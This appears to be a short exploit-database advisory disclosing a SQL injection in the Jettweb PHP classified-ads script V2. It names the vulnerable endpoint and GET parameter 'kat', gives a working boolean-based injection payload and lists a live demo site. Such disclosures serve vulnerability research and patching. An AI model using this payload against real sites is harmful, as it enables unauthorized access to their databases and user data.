Jettweb Php Hazir ilan Sitesi Scripti version 2 suffers from a remote SQL injection vulnerability.
998fc2a9a635b104966962276fba0d47
# Exploit Title: Jettweb Php Hazır İlan Sitesi Scripti V2 - SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/c-23-ilan-Siteleri.html
# Demo Site: http://ilanv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A
----- PoC : SQLi -----
Request: http://localhost/[PATH]/m/katgetir.php?kat=1
Vulnerable Parameter: kat (GET)
Payload: kat=1' OR NOT 1300=1300-- rwTf